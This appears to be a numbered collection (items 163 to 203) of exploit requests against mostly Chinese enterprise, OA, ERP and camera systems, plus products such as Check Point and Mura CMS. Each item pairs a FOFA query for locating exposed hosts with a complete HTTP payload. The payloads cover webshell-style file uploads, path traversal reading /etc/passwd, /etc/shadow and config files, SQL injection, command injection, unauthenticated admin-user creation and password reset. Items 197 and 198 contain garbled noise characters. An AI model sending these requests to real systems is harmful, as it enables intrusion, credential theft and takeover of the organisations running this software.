http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON clinical browsing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

(Stacked MSSQL query: WAITFOR DELAY '0:0:5' makes a vulnerable host answer about 5 s late.)

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

(The poi value is fetched as a URL, so a file:// URL returns the local file in the response.)

191. 亿赛通电子文档安全管理系统 (ESAFENET electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

(The /js/../ segment is part of the request: send the path literally (for example curl --path-as-is), since a client that normalises dot segments collapses it to /CDGServer3/NavigationAjax and the request hits the protected path instead. Time-based, MSSQL WAITFOR DELAY.)

192. 富通天下外贸ERP (Futong Tianxia foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

(The name query parameter supplies the stored filename, so name=.ashx turns the raw request body into an ASP.NET handler; the handler above only writes "test" back.)

193. 山石网科云鉴安全管理系统 (Hillstone Networks 云鉴 security management system) setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Fetch a CSRF token bound to an arbitrary PHPSESSID:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Submit the payload with that token and the same PHPSESSID. The param value is a Python os.system call, so it reaches an eval-style sink; the command writes a marker file into the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read the marker back; the echoed number in the response confirms the command ran:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the servlet is exposed and the instance is likely vulnerable.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

(The traversal in filename places hello.jsp inside the deployed fe.war, where the application server executes it.)

195. 飞鱼星上网行为管理系统 (Volans internet behaviour management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

(xgh identifies the account whose password is set to newPass; the endpoint takes the request without any authentication.)

9 ^$ }/ Q" u) X6 B3 A/ t197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入- x" ?) Q# T  R, g
FOFA:app="浙大恩特客户资源管理系统"
) |; j& ~# Y$ mGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
1 e3 q" @3 ^# mHost:' [3 C- I% c2 A  f5 b+ ~0 t2 x. K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
5 X2 w$ @2 O! a! T- g- AAccept-Encoding: gzip, deflate4 M8 r8 f* K5 q) I% U
Connection: close* `4 j; k. N& \( x
, j" Q2 h: I1 Q0 V! {8 ~$ i1 g% k$ {2 c
0 T0 P  v7 {8 l+ @% D) u+ I0 i

( Z: j! V4 t/ u1 K/ G1 c: x3 ]" n198.  阿里云盘 WebDAV 命令注入$ d: T& P: i6 ^0 r1 o  v
CVE-2024-29640
. z, L- y  H8 d8 gGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1& T1 _% ?# c$ s3 @
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf643 t- Z( G5 F7 v, X; k
Accept: */*: r. e: t! g) C$ g& Z
Accept-Encoding: gzip, deflate5 o4 J1 f2 @, u% d( w5 X. p
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
6 I/ S  E0 I4 A. {/ h" c* bConnection: close
, _! W6 x. j5 W# }( l* a- I7 T9 t+ Z

199. Cockpit CMS assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
1. Fetch the CSRF token from the login page:
GET /auth/login?to=/ HTTP/1.1

Response 200, containing: csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token to obtain a session cookie (the credentials used in this example are admin/admin):
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session cookie, then request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

(The token and cookie values above are from the example; each instance returns its own. The uploaded file deletes itself on first request.)

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

(Time-based, MySQL sleep(5) in the id parameter.)

201. 方正全媒体新闻采编系统 (Founder all-media news editing system) binary.do SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

(TableName is concatenated into the query; the stacked MSSQL WAITFOR DELAY delays the response by about 5 s.)

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
1. Fetch the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Substitute those two values for the placeholders in the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

3. The uploaded file is then served from /_data/Uploads/1123.txt

203. 红海云EHR (Redsea Cloud eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

(Note that the JSP body is declared as image/jpeg: the part's Content-Type is what the upload is sent with, the .jsp extension is what the server stores.)

